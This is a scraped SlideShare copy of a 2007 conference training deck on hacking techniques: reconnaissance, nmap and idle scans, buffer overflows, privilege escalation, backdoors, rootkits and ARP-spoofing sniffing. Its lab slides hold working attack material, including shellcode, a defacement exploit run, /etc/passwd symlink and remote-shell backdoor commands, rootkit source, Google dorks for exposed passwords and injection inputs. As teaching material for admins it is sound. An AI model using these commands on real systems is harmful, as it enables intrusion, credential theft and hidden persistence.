SlideShare a Scribd company logo

Hacking techniques

gaurav koriya
gaurav koriya

hey guys this stuff contain some really good hacking techniques have a look ...

Education
1 of 84
Download to read offline
Hacking Techniques by Michael Hamm 01./02.02.2007 linuxdays.lu 2007 1
Hacking Techniques 01./02.02.2007 linuxdays.lu 2007 2
Hacking Techniques Attackers Objectives Hackers Challange, Status Spies Political Gain Terrorists Financial Gain Insider Damage Prof. Crimminaly Vandals 01./02.02.2007 linuxdays.lu 2007 3
Hacking Techniques Geek Hackers Script Kiddies Stupid Users Automated Scripts / Viruses / Botnet / Spam 01./02.02.2007 linuxdays.lu 2007 4
Hacking Techniques - High profile targets: -- Banks -- Military -- Universities -- Telecom / internet Provide --Private PC’s / Enduser -- Botnet -- Spam -- Homebanking Data 01./02.02.2007 linuxdays.lu 2007 5
Hacking Techniques Most often Security problems: (Source: CSI/FBI Computer Crime and Security Survey) Vir Ins the De Un WL Ha ial ck au us ide ft L NA ing tho of r ap S ris top erv ed ice 01./02.02.2007 linuxdays.lu 2007 6
Hacking Techniques ➤ Network based System Hacking ➤ Web Server Hacking ➤ Physically enter the Target Building ➤ WLAN (Wireless LAN) Hacking ➤ War Dialling ➤ Sniffing ➤ Social Engineering ➤ Viruses 01./02.02.2007 linuxdays.lu 2007 7
Exercise: -- physical access = root rights -- 1. Interupt the bootloader by pressing >> e << 2. Select the kernel line and press >> e << 3. add >> init=/bin/bash << to the kernel line 4. kernel /vmlinuz-2.6.8 root=/dev/hda4 ro init=/bin/bash 5. Press >> Enter << 6. Press >> b << to boot 7. mount –o remount,rw /dev/hda4 8. passwd hamm ( password: test123) 9. passwd (password: test123) 10.sync 11.mount –o remount,ro /dev/hda4 12.shutdown –rn now 13. Login as user hamm & launch vmware; start all VM from top down 01./02.02.2007 linuxdays.lu 2007 8
Hacking Techniques 5. Clearing Tracks 1. Reconnaissance 4. Maintaining Access 2. Scanning 3. Gaining Access 01./02.02.2007 linuxdays.lu 2007 9
Footprinting -- Information Gathering -- ➤ visit targets’ websites ➤ review HTML Code, JavaScript and Comments & robots.txt ➤ search for passwords, hidden directories, contact names ➤ Dumpster Diving Quotation Bill Gates in: Susan Lammers; Programmers at Work Tempus Books; Reissue Edition, 1989 „No, the best way to prepare is to write programs, and to study great programs that other people have written. In my case, I went to the garbage cans at the Computer Science Centre and I fished out listings of their operating system.“ 01./02.02.2007 linuxdays.lu 2007 10
Footprinting -- Information Gathering -- ➤ whois request at the Network Information Centre -- receive information about IP address ranges -- Names and EMail addresses of responsibles whois -h whois.dns.lu linuxdays.lu domainname: linuxdays.lu nserver: arthur.tudor.lu nserver: dorado.tudor.lu org-name: Centre de Recherche Public Henri Tudor adm-email: pierre.plumer@crpht.lu tec-name: Xavier Detro tec-email: xavier.detro@tudor.lu Important whois domains: - RIPE (Europe & N-Africa) - APNIC (Asia Pacific) - ARIN (N-America & S-Africa) - LACNIC (Latin America) 01./02.02.2007 linuxdays.lu 2007 11
Footprinting -- Exercise Information Gathering -- ➤ DNS Lookup -- use nslookup tools to receive informations about DNS- & EMAIL Server, looking for names like Oracle, TestLinux, .... -- try a zone transfer ➤ Footprinting by DNS: nslookup(1); host(1); dig(1); # nslookup > server 192.168.22.22 > www.mumm.lu > set type=mx > mumm.lu > set type=any > mumm.lu > ls –d mumm.lu # try zone transfer > exit # dig @192.168.22.22 mumm.lu axfr # Zonetransfer 01./02.02.2007 linuxdays.lu 2007 12
Footprinting -- Information Gathering -- ➤ whois tools: -- Sam Spade www.samspade.org -- Smart Whois www.tamos.com -- Netscan www.netscantools.com -- GTWhois www.geektools.com -- http://www.all-nettools.com/toolbox ➤ DNS must reads: -- RFC 1912 Common DNS Errors -- RFC 2182 Secondary DNS Servers -- RFC 2219 Use of DNS Aliases 01./02.02.2007 linuxdays.lu 2007 13
Footprinting -- Information Gathering -- ➤ footprinting @ google ➤ news group articles of employees @<targetdomain> ➤ search business partners link:<targetdomain> ➤ site:<targetdomain> intitle:index.of ➤ site:<targetdomain> error | warning ➤ site:<targetdomain> login | logon ➤ site:<targetdomain> username | userid ➤ site:<targetdomain> password ➤ site:<targetdomain> admin | administrator ➤ site:<targetdomain> inurl:backup | inurl:bak ➤ site:<targetdomain> intranet 01./02.02.2007 linuxdays.lu 2007 14
Google Hacking -- Introduction -- The Beginnings: www.theregister.co.uk/2001/11/28/the_google_attack_engine/ Link points to a Switch of a .gov Network Google not 'hackers' best friend‘ -- ww.vnunet.com/News/1127162 Index.of +banques +filetype:xls Johnny (I hack stuff) Long ‘Google Hacking for Penetration Testers’ Google Hacking Database http://johnny.ihackstuff.com 12.03.2006 Chicago Tribune http://www.heise.de/newsticker/meldung/70752 2600 CIA Agents discovered via Search Engine 01./02.02.2007 linuxdays.lu 2007 15
Google Hacking -- Introduction -- What to know: Advanced Operands: site:<domainname> inurl:<path> filetype:<xls|doc|pdf|mdb|ppt|rtf|…….> intitle:<keyword> intext:<keyword> … … Google as an ‘Anonymous Proxy’ Google Cache &strip=1 01./02.02.2007 linuxdays.lu 2007 16
Google Hacking -- Introduction -- What to know: The Power of combining Advanced Operands: site:heise.de –site:www.heise.de -- shows all websites NOT from the official Webserver -- maps nre hostnames without contacting target network -- wap.heise.de, chat.heise.de, www.tb.heise.de, … Offline Analysis of the search result: -- www.sensepost.com/research_misc.html -- SOAP Google API 01./02.02.2007 linuxdays.lu 2007 17
Google Hacking -- Introduction -- What to find: The Google Hacking Database (johnny.ihackstuff.com): -- Directory Listings  Hidden/Private Files intitle:index.of ‘parent directory’ intitle:index.of.admin intitle:index.of inurl:admin intitle:index.of ws_ftp.log -- Error Messages of Scripts ‘Fatal error: call to undefined function’ –reply –the –next ‘Warning: Failed opening’ include_path -- Search for vulnerable Scripts inurl:guestbook/guestbooklist.asp ‘Post Date’ ‘From Country’ -- Search for Backups filetype:bak inurl:php.bak filetype:bak inurl:php.bak -- Search for: --- Printers; --- Webcams; --- Intranet Sites; --- Network Tools Ntop, MRTG; --- Databases 01./02.02.2007 linuxdays.lu 2007 18
Google Hacking -- Exercise -- Livecycle of a Google Hack: 1. Security Problem deicovered on online product; 2. Analyse online product 3. Find typical string 4. Create a google request 5. Find vulnerable websites Examples: -- inurl:php.bak mysql_connect mysql_select_db -- ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-“ -- "index of/" "ws_ftp.ini" "parent directory“ -- !Host=*.* intext:enc_UserPassword=* ext:pcf -- "admin account info" filetype:log -- enable password | secret "current configuration“ -intext:the 01./02.02.2007 linuxdays.lu 2007 19
Preparation anonymity doesn’t exist ➤ break systems in different countries / time zones ➤ install network multipurpose tools like netcat or backdoors ➤ hop from host to host to get anonymity 01./02.02.2007 linuxdays.lu 2007 20
Hacking Techniques 5. Clearing Tracks 1. Reconnaissance 4. Maintaining Access 2. Scanning 3. Gaining Access 01./02.02.2007 linuxdays.lu 2007 21
Scanning -- Goals -- ➤ mapping of the target network ➤ use system tools like traceroute & ping ➤ Visual Tools: NeoTrace (Visual Trace) & Visual Route ➤ finding the range of IP addresses ➤ discerning the subnet mask ➤ identify network devices like firewalls & routers ➤ identify servers ➤ mapping of the reachable services ➤ detecting `live` hosts on target network ➤ discovering services / listening ports / portscan; nmap; ➤ identifying operating system & services ➤ identify application behind services & patch level 01./02.02.2007 linuxdays.lu 2007 22
Scanning -- Network Mapping -- Nmap: find living hosts $ su – # ns_mumm # cat /etc/resolve.conf # nmap –sL www.mumm.lu/27 # List Scan (only do nslookup for the IP rage) # nmap –-packet_trace –sP www.mumm.lu/27 # ICMP/TCP (send ICMP Echo Request and ACK to Port 80 if RST is received  host is alive / unfiltered ) # nmap –n –P0 –sU –g 53 –p 53 –T polite www.mumm.lu/27 ( UDP Scans are alomost NOT usefully; -g 53 = sourceport -P0 = don’t PingScan first; -T polite = scan speed) -sF, -sX, -sN, –sA, # not usable FIN-, XMAS-, Null-, ACK- Scan # today 01./02.02.2007 linuxdays.lu 2007 23
Scanning -- Port Scanning -- Nmap: port scan (connect scan) # nmap –n –sT –P0 –p 80 192.168.22.21,22,24 # nmap –n –sT –P0 –p 110 192.168.22.21,22,24 SYN Port open SYN/ACK ACK RST/ACK Port closed SYN RST/ACK 01./02.02.2007 linuxdays.lu 2007 24
Scanning -- Port Scanning -- Nmap: port scan (stealth scan) # nmap –n –sS –P0 –p 80 192.168.22.21,22,24 # nmap –n –sS –P0 –p 110 192.168.22.21,22,24 SYN Port open SYN/ACK RST Port closed SYN RST/ACK 01./02.02.2007 linuxdays.lu 2007 25
Scanning -- Port Scanning -- Nmap: port scan # nmap –n –sT –P0 –p 20-25,80,443 192.168.22.21,22,24 # nmap –n –sS –P0 –p 20-25,80,443 192.168.22.21,22,24 Techniques to stay anonymous: silent scan: # nmap –n –sT –P0 –T sneaky –p 20-25,80 192.168.22.22 fragmentation scan # nmap –n –P0 –f –p 20-25,80 192.168.22.22 decoy scan # nmap –n -P0 –D 1.1.1.1,2.2.2.2,ME,3.3.3.3 –p 80 <host> 01./02.02.2007 linuxdays.lu 2007 26
Scanning -- Exercise -- Scan the MUMM.LU network: 01./02.02.2007 linuxdays.lu 2007 27
Advanced Scanning -- IP-ID Idle Scan -- Exercise: Who the hell is scanning you? target perform: # tcpdump –n –i eth0 host 192.168.4.<your IP Address> attacker perform: (idle_scan) 01./02.02.2007 linuxdays.lu 2007 28
Advanced Scanning -- IP-ID Idle Scan -- - based on IP-ID prediction - example with hping2 –SA –p 80 –c 5 <switch ip> - all packets have Fragment-ID Number - every new packet increases the IP ID Number - by most systems IP ID + 1 - this is exploitable - by monitoring the IP ID value of a host - you know how many packets he sends - this could be abused for zombie port scanning 01./02.02.2007 linuxdays.lu 2007 29
Advanced Scanning -- IP-ID Idle Scan -- Step 1: A) send SYN/ACK to Zombie B) investigate the answer IPID C) repeate A) and B) multiple times, verify quality of Zombie IP-ID Probe -> SYN/ACK Response -> RST; IPID=2 IP-ID Probe -> SYN/ACK Response -> RST; IPID=3 IP-ID Probe -> SYN/ACK Zombie Response -> RST; IPID=4 IP-ID Probe -> SYN/ACK Response -> RST; IPID=5 01./02.02.2007 linuxdays.lu 2007 30
Advanced Scanning -- IP-ID Idle Scan -- Step 2: A) Send SYN to target BUT spoof the Source IP Adress, claim to be the Zombie B) open port: Target send SYN/ACK to Zombie C) open port: Zombie send RST and increase IPID to Target Zombie SYN; Port=80; C K N/A SRC IP = <zombie> SY ID= 6 IP RST; Target 01./02.02.2007 linuxdays.lu 2007 31
Advanced Scanning -- IP-ID Idle Scan -- Step 2: A) Send SYN to target BUT spoof the Source IP Adress, claim to be the Zombie B) close port: Target simply send a RST to the Zombie Zombie SYN; Port=80; T RS SRC IP = <zombie> Target 01./02.02.2007 linuxdays.lu 2007 32
Advanced Scanning -- IP-ID Idle Scan -- Step 3: A) send SYN/ACK to Zombie B) investigate the answer IPID If IPID = 6  port was close If IPID = 7  port was open IP-ID Probe -> SYN/ACK Response -> RST; IPID=7 Zombie 01./02.02.2007 linuxdays.lu 2007 33
Advanced Scanning -- IP-ID Idle Scan -- IP ID Idle Scan with nmap # nmap –n –P0 –p20-25,80,443 –sI <zombie> <target> # nmap –n –P0 –p20-25,80,443 –sI 10.10.10.10 10.10.11.11 01./02.02.2007 linuxdays.lu 2007 34
Scanning -- Identifying Services -- Banner Grabbing & Version Mapping: - What services are bound to the port: -- identifying service / protocoll; -- identifying Server-Software; -- identifying Version Number; -- identifying additional Modules etc. automatic approach # nmap –n –p 20-25,80,443 –sV 192.168.22.22,25 # nmap –n –p 20-25,80,443 –oM scan1 192.168.22.22,25 # amap –B –i scan1 # amap –i scan1 01./02.02.2007 linuxdays.lu 2007 35
Scanning -- Identifying Services -- Banner Grabbing & Version Mapping: manual approach with Netcat # nc 192.168.22.22 22 # nc 192.168.22.22 80 HEAD / HTTP/1.0 # nc 192.168.22.21 21 # nc 192.168.22.21 80 HEAD / HTTP/1.0 OS Detection # nmap –O 192.168.22.22,25 # xprobe2 192.168.22.22 # xprobe2 –p tcp:443:open 192.168.22.22 01./02.02.2007 linuxdays.lu 2007 36
Hacking Techniques 5. Clearing Tracks 1. Reconnaissance 4. Maintaining Access 2. Scanning 3. Gaining Access 01./02.02.2007 linuxdays.lu 2007 37
Gaining Access -- Where are we now -- At this point we know (without doing something illegal at all): -- Targets business (products, partners, emplyees) -- overview of the network topology -- overview of live servers and open ports -- services in use, server-software, version numbers How to proceed: -- is there a known vulnerability -- do we know a vulnerability -- known configuration problems -- default passwords prepare attack -- research on internet for known security holes -- default passwords; common misconfigurations -- setup a test environment to practice the attack -- ideal: fire one single attack 01./02.02.2007 linuxdays.lu 2007 38
Gaining Access -- prepare attack -- 01./02.02.2007 linuxdays.lu 2007 39
Gaining Access -- prepare attack -- 01./02.02.2007 linuxdays.lu 2007 40
Gaining Access -- prepare attack -- 01./02.02.2007 linuxdays.lu 2007 41
Gaining Access -- prepare attack -- 01./02.02.2007 linuxdays.lu 2007 42
Gaining Access -- Buffer Overflow -- ➤ Stack Based Buffer Overflows ➤ Off-by-One Overflows ➤ Frame Pointer Overwrites ➤ BSS Overflows ➤ Heap Overflows 01./02.02.2007 linuxdays.lu 2007 43
Gaining Access -- Stack Based Buffer Overflow -- ➤ C/C++ problem ➤ programming error ➤ Copy to much variable user input into fixed sized buffer #include <stdio.h> int main() { char name[31]; printf("Please type your name: "); gets(name); printf("Hello, %s", name); return 0; } Buffer overflow occur if you enter `1234567890123456789012345678901234567890` 01./02.02.2007 linuxdays.lu 2007 44
Gaining Access -- Stack Based Buffer Overflow -- Exploitation: -- Missing bounds checking -- Mutiple „unsafe“ functions in libc -- Executing code in the data/stack segment -- Creating the to be feed to the application Memory layout of a process: high address Stack LIFO – top of the stack Heap no ‘execution’ attribute set BSS Data ‘read-only’ attribute Code low address 01./02.02.2007 linuxdays.lu 2007 45
Gaining Access -- Stack Based Buffer Overflow -- - function parameters -- Stack holding all the information for the function - local variables -- Stack is created at the beginning of a function - data to recover previous frame -- Stack is released at the end of a function Stack -- LIFO mechanism to pass arguments to functions and to reference local variables Frame 1 void function (void) { [ ... ] } Frame 2 EBP int POP main (void) { ESP int a; PUSH function (argv[1]) [ ... ] EIP: Extended Instruction Pointer } EBP: Extended Base Pointer ESP: Extended Stack Pointer 01./02.02.2007 linuxdays.lu 2007 46
Gaining Access -- Stack Based Buffer Overflow -- void Stack 3 function (char *args) { 4 char buff[512]; args strcpy (buff, args); Return Address EIP main () } SFP Frame 1 saved registers int local variables 1 main (int argc, char *argv[]) args { Return Address EIP if (argc > 1) SFP EBP function () saved registers { Frame 2 2 function (argv[1]); local variables } else printf ("no inputn"); buff[512] ESP return 0; } EIP: Extended Instruction Pointer EBP: Extended Base Pointer ESP: Extended Stack Pointer 01./02.02.2007 linuxdays.lu 2007 47
Gaining Access -- Stack Based Buffer Overflow -- void Stack 3 function (char *args) { 4 char buff[512]; args 5 strcpy (buff, args); main () Return Address } EBP Frame 1 saved registers int local variables 1 main (int argc, char *argv[]) args { Wrong Return if (argc > 1) SFP function () saved registers { Frame 2 2 function (argv[1]); } else buff[512] printf ("no inputn"); return 0; } 01./02.02.2007 linuxdays.lu 2007 48
Gaining Access -- Stack Based Buffer Overflow -- void Stack 3 function (char *args) { 4 char buff[512]; args 5 strcpy (buff, args); main () Return Address 6 } EBP Frame 1 saved registers int local variables 1 main (int argc, char *argv[]) args { Wrong Return if (argc > 1) SFP function () saved registers { Frame 2 2 function (argv[1]); } else buff[512] printf ("no inputn"); return 0; } 01./02.02.2007 linuxdays.lu 2007 49
Gaining Access -- Stack Based Buffer Overflow -- void Stack 3 function (char *args) { 4 char buff[512]; 5 strcpy (buff, args); main () 6 } Frame 1 int 1 main (int argc, char *argv[]) 0x0A00 { 0x0A00 if (argc > 1) 0x0A00 function () 0x0A00 { Frame 2 function (argv[1]); shellcode 2 shellcode 0x0C00 } else nop 0x0A00 printf ("no inputn"); nop 0x0800 return 0; } 01./02.02.2007 linuxdays.lu 2007 50
Gaining Access -- Shellcode -- char linux_ia32_shellcode[]= "x31xc0" /* xorl %eax,%eax */ "x50" /* pushl %eax */ "x68""//sh" /* pushl $0x68732f2f */ "x68""/bin" /* pushl $0x6e69622f */ "x89xe3" /* movl %esp,%ebx */ "x50" /* pushl %eax */ "x53" /* pushl %ebx */ "x89xe1" /* movl %esp,%ecx */ "x99" /* cdql */ "xb0x0b" /* movb $0x0b,%a1 */ "xcdx80" /* int $0x80 */ Old school payload: bindshell, backconnect 01./02.02.2007 linuxdays.lu 2007 51
Gaining Access -- Exercise: Web Site defacement -- $ cd /home/hamm/ssl/ $ ls –la $ ./openSSL 0x73 192.168.22.21 443 –c 40 /usr/bin/whoami echo "hacked by me….. " > /var/www/html/index.html - Unprivileged user -> local user privileges escalation 01./02.02.2007 linuxdays.lu 2007 52
Gaining Access -- Exercise: Web Site defacement -- What do we see on the Firewall??? 01./02.02.2007 linuxdays.lu 2007 53
Gaining Access primary target webserver -- why they are so vulnerable -- ➤ complex application ➤ multiple subsystems: application server, scripts, sql-server ➤ self made applications: programmers don’t know how to write secure code ➤ Shell-Command-Injection: bypass commands through the shell Input: "Alice; rm - rf" ➤ SQL-Injection bypass SQL Commands by User input Input: "User=Alice' -&Pass=Idontknow" 01./02.02.2007 linuxdays.lu 2007 54
Hacking Techniques 5. Clearing Tracks 1. Reconnaissance 4. Maintaining Access 2. Scanning 3. Gaining Access 01./02.02.2007 linuxdays.lu 2007 55
Maintaining Access -- be silent -- ➤ after a successful initial attack ➤ hide the tracks from logfiles ➤ expand local rights; find vulnerabilities in network ➤ install rootkits, steal password database, start network sniffer ➤ try same password on other systems ➤ find problems in topology (ex. dual homed hosts) ➤ try to attack the private network 01./02.02.2007 linuxdays.lu 2007 56
Maintaining Access Privileges Escalation -- Race Condition -- what could I try to attack? - SUID / SGID binaries find / -perm –4000 –type f –user root –print find / -perm –2000 –type f –group root –print - privileged process - Kernel - password file Source of problems? - configuration error - local software vulnerabilities -- buffer overflow -- race condition -- format string 01./02.02.2007 linuxdays.lu 2007 57
Maintaining Access Privileges Escalation -- example: race_bug -- #include <stdio.h> #include <unistd.h> int main (int argc, char *argv[]) { char path[] = "/tmp/race.txt" FILE *fp; fp = fopen (path, "a+"); fprintf (fp, "%sn", argv[1]); fclose (fp); unlink (path); return 0; } 01./02.02.2007 linuxdays.lu 2007 58
Maintaining Access Privileges Escalation -- example: race_bug -- Prepare attack $ cd /home/hamm/race $ ls –la $ ./race_bug test $ ls –la /tmp $ cat /etc/passwd $ su -; cp /etc/passwd /etc/passwd.bak; exit Attak: $ ln –s /etc/passwd /tmp/race.txt $ ls –la /tmp $ cat command $ ./command $ ls –la /tmp $ cat /etc/passwd $ su – bimbam # id 01./02.02.2007 linuxdays.lu 2007 59
Maintaining Access Privileges Escalation -- Exercise: privileges escalation -- $ su – # cd /home/hamm/ssl/ # ls –la # cp p /tftpboot # /etc/init.d/atftpd start # exit $ ./openSSL 0x73 192.168.22.21 443 –c 40 /usr/bin/whoami pwd /usr/bin/tftp 192.168.22.1 mode binary # local root exploit get p # kernel 2.2.x 2.4.x quit ls –l chmod +x p ls –l ./p whoami 01./02.02.2007 linuxdays.lu 2007 60
Maintaining Access Port Knocking -- introduction -- Aka Port Knocking Back Door - Open Port????? - no promisc mode, no open ports - raw sockets - trigger for special packets to get activated - attacker: -- send trigger pkg1 -- send trigger pkg2 -- send trigger pkg3 -- send command pkg1 Port 80, 443 open; statefull - example: Sadoor http://cmn.listptojects.darklab.org 01./02.02.2007 linuxdays.lu 2007 61
Maintaining Access Port Knocking -- Sadoor example -- Sadoor daemon configuration: /etc/sadoor/sadoor.pkts # key 1 keypkt { ip { daddr = 192.168.22.24; saddr = 192.168.22.1; icmp { type = 8; } } } # key 2 keypkt { ip { daddr = 192.168.22.24; saddr = 192.168.22.1; tcp { flags = SYN; dport = 80; sport = 3456; } } } 01./02.02.2007 linuxdays.lu 2007 62
Maintaining Access Port Knocking -- Sadoor example -- Sadoor daemon configuration: /etc/sadoor/sadoor.pkts # key 3 keypkt { ip { daddr = 192.168.22.24; saddr = 192.168.22.1; udp { dport = 111; data { bimx20bam } } } } # command cmdpkt { ip { daddr = 192.168.22.24; saddr = 192.168.22.1; tcp { sport = 80; sport = 12345; } } } 01./02.02.2007 linuxdays.lu 2007 63
Maintaining Access Port Knocking -- Sadoor example -- Create a config-image database and download it to /home/hamm/.sash mksadb mv sadoor.db /var/www/html/ chmod 644 /var/www/html/sadoor.db Run the daemon /usr/sbin/sadoor Review logging tail –f /etc/sadoor/sadoor.log 01./02.02.2007 linuxdays.lu 2007 64
Maintaining Access Port Knocking -- Sadoor example -- ON CLIENT side: 1. Download http://testwww.mumm.lu/sadoor.db 2. become root cd cd .sash mv /home/hamm/sadoor.db . sadbcat sadoor.db sash.db # create encrypted db rm –f sadoor.db # delete plain sequence 3. Sending commands sash 192.168.22.24 –vv –r "cat /etc/passwd > /var/www/html/test.txt" sash 192.168.22.24 "chmod 644 /var/www/html/test.txt" 4. Establish a connection / remote shell sash 192.168.22.24 –vv sh-2.05b# whoami sh-2.05b# /sbin/ifconfig sh-2.05b# exit 01./02.02.2007 linuxdays.lu 2007 65
Hacking Techniques 5. Clearing Tracks 1. Reconnaissance 4. Maintaining Access 2. Scanning 3. Gaining Access 01./02.02.2007 linuxdays.lu 2007 66
Clearing Tracks Rootkits -- introduction -- Main goals of a rootkit: - hide activities of an attacker to the legal administrator -- active processes -- directories & files -- network activities - provide a backdoor to the system - let the attacker become root whenever he want - collect sensitive data -- from network -- from user input 01./02.02.2007 linuxdays.lu 2007 67
Clearing Tracks Rootkits -- introduction -- 1th generation: Binary Rootkits - replace important system tools by modified versions: -- du(1), locate(1), netstat(1), ps(1), top(1), -- ifconfig(1), w(1), who(1), ….. - defined parameters will become invisible in the future: -- IP Addresses -- directories & files -- usernames - easy to discover: -- by filesystem inegrity checker: -- tripwire, -- aide - examples: Irk3-6, (Linux), Fbrk (FreeBSD), Solaris Rootkit 01./02.02.2007 linuxdays.lu 2007 68
Clearing Tracks Rootkits -- introduction -- 2th generation: LKM (Loadable Kernel Modules) Rootkits - expand the functionality of the kernel - can be loaded dynamically: insmod(3), rmmod(3) - implemented as device driver -> high level of flexibility - implementations: -- new modules -- infecting existing modules - result: trojaned kernel  full control over all userland apps. 01./02.02.2007 linuxdays.lu 2007 69
Clearing Tracks Rootkits -- introduction -- 2th generation: LKM (Loadable Kernel Modules) Rootkits - syscalls: a gate between userland and kernel - example for syscalls: trace /bin/ls execve(… uname(… brk(0) old_mmap(… access(… open(… open(… … … 01./02.02.2007 linuxdays.lu 2007 70
Clearing Tracks Rootkits -- introduction -- 2th generation: LKM (Loadable Kernel Modules) Rootkits - normal syscall: parameter into int 80 registers Userland Kernel selection of the Interrupt handler: Exec syscall interrupt handler syscall selection example: mkdir Interrupt Descriptor Table Syscall Table (IDT) 01./02.02.2007 linuxdays.lu 2007 71
Clearing Tracks Rootkits -- introduction -- 2th generation: LKM (Loadable Kernel Modules) Rootkits - manipulated syscall: parameter into int 80 registers Userland Kernel selection of the Interrupt handler: Exec syscall interrupt handler syscall selection Exec syscall example: mkdir manipluated: mkdir Interrupt Descriptor Table Syscall Table (IDT) 01./02.02.2007 linuxdays.lu 2007 72
Clearing Tracks Rootkits -- introduction -- 2th generation: LKM Rootkit: Exercise: mkdir_Rootkit #define MODULE /* the new mkdir syscall */ #define __KERNEL__ int hack_mkdir (const char *path) { printk ("BimBam!n"); #include <linux/module.h> return 0; #include <linux/version.h> } #include <linux/kernel.h> #include <sys/syscall.h> int init_module (void) { #include <stdio.h> orig_mkdir=sys_call_table[SYS_mkdir]; sys_call_table[SYS_mkdir]=hack_mkdir; MODULE_LICENSE("GPL"); return 0; } /* import syscall table */ extern void *sys_call_table[]; void cleanup_module (void) { sys_call_table[SYS_mkdir]=hack_mkdir; /* dummy for old mkdir syscall */ } int (*orig_mkdir) (const char *path); 01./02.02.2007 linuxdays.lu 2007 73
Clearing Tracks Rootkits -- introduction -- 2th generation: LKM Rootkit: Exercise: mkdir_Rootkit cd /root/rootkit/mkdir gcc –c –I /usr/src/linux/include mkdir.c insmod mkdir.o lsmod mkdir test ls –la cat /var/log/messages rmmod mkdir lsmod mkdir test ls –la 01./02.02.2007 linuxdays.lu 2007 74
Clearing Tracks Rootkits -- introduction -- 2th generation: LKM Rootkit: Adore cd /root/rootkit/adore/ insmod adore.o lsmod insmod cleaner.o lsmod rmmod cleaner lsmod ps aux | grep ssh ./ava i <PID SSHD> ps aux | grep ssh netstat –punta | grep 22 mkdir /root/rootkit/bimbam ./ava h /root/rootkit/bimbam ls –la /root/rootkit ./ava –U dummy 01./02.02.2007 linuxdays.lu 2007 75
Clearing Tracks Rootkits -- introduction -- 3th generation: (Virtual File System) VFS Layer Rootkit - sys_call_table is not exported anymore -- Red Hat 8.0 (Kernel 2.4.18) -- Kernel 2.5.41  - all Syscalls which access the Filesystem make use of the Virtual File System - in Unix, most of all is handled like a file - existing Handler-Routines are replaced by modified one  files/folder could be hidden  via /proc hidding of processes 01./02.02.2007 linuxdays.lu 2007 76
Clearing Tracks Rootkits -- introduction -- 3th generation: (Virtual File System) VFS Layer Rootkit parameter into int 80 registers Userland Kernel selection of the Interrupt handler: Syscall interrupt handler syscall selection VFS ext2/ ext3/ ... Interrupt Descriptor Table Syscall Table (IDT) 01./02.02.2007 linuxdays.lu 2007 77
Hacking Techniques Insider Attacks 01./02.02.2007 linuxdays.lu 2007 78
Insider Attacks -- Password Sniffing true a Switch -- Default Gateway Attacked PC IP: 10.10.10.1 IP: 10.10.10.2 MAC: 11:11:11:11:11:11 MAC: 22:22:22:22:22:22 ARP Reply IP 10.10.10.1 MAC 99:99:99:99:99:99 No gratuitous ARP, BUT directed ARP: ETHERNET II Dst: 22:22:22:22:22:22 IP: 10.10.10.99 SRC: 99:99:99:99:99:99 MAC: 99:99:99:99:99:99 ARP reply: Sender IP addr: 10.10.10.1 Sender MAC addr: 99:99:99:99:99:99 01./02.02.2007 linuxdays.lu 2007 79
Insider Attacks -- Password Sniffing true a Switch -- Exercise: 1. echo 1 > /proc/sys/net/ipv4/ip_forward 2. arpspoof –i eth0 –t 192.168.4.30 192.168.4.28 3. dsniff -cn Telnet Client: Telnet Server: IP: 192.168.3.3 IP: 192.168.3.4 IP: ___.___.___.___ IP: ___.___.___.___ Attacker: IP: 192.168.3.2 MAC: 00:08:74:B3:BB:F1 IP: ___.___.___.___ MAC: __:__:__:__:__:__ 01./02.02.2007 linuxdays.lu 2007 80
Insider Attacks SSH MitM Attack -- by DNS Spoofing -- SSH Server: IP: 192.168.3.3 DNS Query (HOST: server_xyz.lu) Target: SSH Client: IP: 192.168.3.xx Default Gateway: IP: 192.168.3.1 DNS Server: IP: 158.64.4. Attacker: IP: 192.168.3.2 DNS Response (server_xyz.lu, 192.168.3.2) 01./02.02.2007 linuxdays.lu 2007 81
Insider Attacks SSH MitM Attack -- by DNS Spoofing -- 01./02.02.2007 linuxdays.lu 2007 82
Insider Attacks SSH MitM Attack -- by DNS Spoofing -- SSH Server: IP: 192.168.3.3 Target: SSH Client: IP: 192.168.3.xx Default Gateway: IP: 192.168.3.1 DNS Server: IP: 158.64.4. Attacker: IP: 192.168.3.2 01./02.02.2007 linuxdays.lu 2007 83
Hacking for Admins by Michael Hamm 01./02.02.2007 linuxdays.lu 2007 84

Recommended

DoS or DDoS attack
DoS or DDoS attackDoS or DDoS attack
DoS or DDoS attackstollen_fusion
 
Spoofing
SpoofingSpoofing
SpoofingSanjeev
 
Malware
MalwareMalware
MalwareAnoushka Srivastava
 
All about Hacking
All about HackingAll about Hacking
All about HackingMadhusudhan G
 
Brute force attack
Brute force attackBrute force attack
Brute force attackJamil Ali Ahmed
 
Basic Dynamic Analysis of Malware
Basic Dynamic Analysis of MalwareBasic Dynamic Analysis of Malware
Basic Dynamic Analysis of MalwareNatraj G
 
Dns presentation
Dns presentationDns presentation
Dns presentationAnurag Pandey
 
Hacking and Types of Hacker.
Hacking and Types of Hacker.Hacking and Types of Hacker.
Hacking and Types of Hacker.Coder Tech
 

Recommended

DoS or DDoS attack
DoS or DDoS attackDoS or DDoS attack
DoS or DDoS attackstollen_fusion
 
Spoofing
SpoofingSpoofing
SpoofingSanjeev
 
Malware
MalwareMalware
MalwareAnoushka Srivastava
 
All about Hacking
All about HackingAll about Hacking
All about HackingMadhusudhan G
 
Brute force attack
Brute force attackBrute force attack
Brute force attackJamil Ali Ahmed
 
Basic Dynamic Analysis of Malware
Basic Dynamic Analysis of MalwareBasic Dynamic Analysis of Malware
Basic Dynamic Analysis of MalwareNatraj G
 
Dns presentation
Dns presentationDns presentation
Dns presentationAnurag Pandey
 
Hacking and Types of Hacker.
Hacking and Types of Hacker.Hacking and Types of Hacker.
Hacking and Types of Hacker.Coder Tech
 
Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Gaurav Sharma
 
The CIA triad.pptx
The CIA triad.pptxThe CIA triad.pptx
The CIA triad.pptxGulnurAzat
 
DDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin BishtDDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin BishtNitin Bisht
 
Hacking ppt
Hacking pptHacking ppt
Hacking pptRashed Sayyed
 
Brute force attack
Brute force attackBrute force attack
Brute force attackjoycruiser
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attackAhmed Ghazey
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Umesh Mahawar
 
Different types of attacks in internet
Different types of attacks in internetDifferent types of attacks in internet
